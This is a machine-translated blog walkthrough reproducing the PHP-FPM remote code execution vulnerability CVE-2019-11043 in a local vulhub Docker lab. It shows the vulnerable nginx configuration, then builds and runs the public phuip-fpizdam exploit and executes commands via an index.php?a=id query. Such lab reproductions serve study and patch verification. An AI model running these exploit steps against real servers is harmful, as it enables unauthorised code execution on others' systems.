当前位置:网站首页>Cve-2019-11043 (PHP Remote Code Execution Vulnerability)
Cve-2019-11043 (PHP Remote Code Execution Vulnerability)
2022-07-06 04:54:00 【w01ke】
One 、 Vulnerability description
CVE-2019-11043 It's a Remote Code Execution Vulnerability , Using some specific configuration of Nginx + PHP-FPM There is a vulnerability in our server , Allows attackers to execute code remotely .
towards Nginx + PHP-FPM Server for URL send out %0a
when , The server returned an exception .
The vulnerability needs to be in nginx.conf Specific configuration in can trigger . The specific configuration is as follows :
location ~ [^/]\.php(/|$) {
...
fastcgi_split_path_info ^(.+?\.php)(/.*)$;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_pass php:9000;
...
}
Attackers can use line breaks (%0a) To destroy fastcgi_split_path_info
Directive Regexp. Regexp Damaged, resulting in PATH_INFO It's empty , This triggers the vulnerability .
Two 、 scope
stay Nginx + PHP-FPM In the environment , When the above... Is enabled Nginx After the configuration , following PHP The version is affected by this vulnerability , in addition ,PHP 5.6 The version is also affected by this vulnerability , But for now, it's just Crash, No remote code execution :
● PHP 7.0 edition
● PHP 7.1 edition
● PHP 7.2 edition
● PHP 7.3 edition
3、 ... and 、 Loophole recurrence
Use P Cow's docker The environment is reproduced :
PHP-FPM Remote code execution vulnerability (CVE-2019-11043)
1、 install docker、golang Environmental Science
sudo apt-get install docker docker-compose
sudo apt install golang
2、 Build a loophole environment
git clone https://github.com/vulhub/vulhub.git
cd vulhub/php/CVE-2019-11043 && docker-compose up -d
After starting the environment , You can see the default page of the vulnerability environment . Here is http://127.0.0.1:8080/index.php
3、 Install exploit tools
git clone https://github.com/neex/phuip-fpizdam.git
cd phuip-fpizdam
go get -v && go build
Error reason : The default is proxy.golang.org, Can't visit... At home
Change a proxy address that can be accessed in China :https://goproxy.cn. Re execute the command
go env -w GOPROXY=https://goproxy.cn
go get -v && go build
4、 Exploit
go run . "http://127.0.0.1:8080/index.php"
visit http://127.0.0.1/index.php?a=id
Be careful , because php-fpm Will start multiple sub processes , During a visit to /index.php?a=id You need to visit more than once , To access the contaminated process .
curl ip.sb by Linux China query public network IP The order of
Four 、 Reference link
https://github.com/vulhub/vulhub/blob/master/php/CVE-2019-11043/README.zh-cn.md
https://github.com/neex/phuip-fpizdam
https://wolke.cn/post/4f87817f.html
边栏推荐
- Redis 排查大 key 的4種方法,優化必備
- Ue5 small knowledge freezerendering view rendered objects in the cone
- ue5 小知识点 开启lumen的设置
- 驱动开发——HelloWDM驱动
- 项目经理,你会画原型嘛?项目经理需要做产品设计了?
- Delete subsequence < daily question >
- Sqlserver query results are not displayed in tabular form. How to modify them
- Digital children < daily question> (Digital DP)
- Use sentinel to interface locally
- 团队协作出了问题,项目经理怎么办?
猜你喜欢
Embedded development program framework
程序员在互联网行业的地位 | 每日趣闻
图论的扩展
Postman断言
Leetcode dynamic planning day 16
麦斯克电子IPO被终止:曾拟募资8亿 河南资产是股东
Fuzzy -- basic application method of AFL
IPv6 comprehensive experiment
[classic example] binary tree recursive structure classic topic collection @ binary tree
Class inheritance in yyds dry inventory C
随机推荐
也算是學習中的小總結
SQL injection vulnerability (MSSQL injection)
也算是学习中的小总结
Vulnerability discovery - vulnerability probe type utilization and repair of web applications
ISP learning (2)
11. Intranet penetration and automatic refresh
What should the project manager do if there is something wrong with team collaboration?
Sorting out the knowledge points of multicast and broadcasting
Digital children < daily question> (Digital DP)
How to estimate the population with samples? (mean, variance, standard deviation)
Yyds dry goods inventory OSI & tcp/ip
EditorUtility. The role and application of setdirty in untiy
I'd like to ask about the current MySQL CDC design. In the full volume phase, if a chunk's binlog backfill phase,
[classic example] binary tree recursive structure classic topic collection @ binary tree
Leetcode dynamic planning day 16
Bubble sort
Flink kakfa data read and write to Hudi
Leetcode 186 Flip the word II in the string (2022.07.05)
Can CDC pull the Oracle table in full
Postman测试报告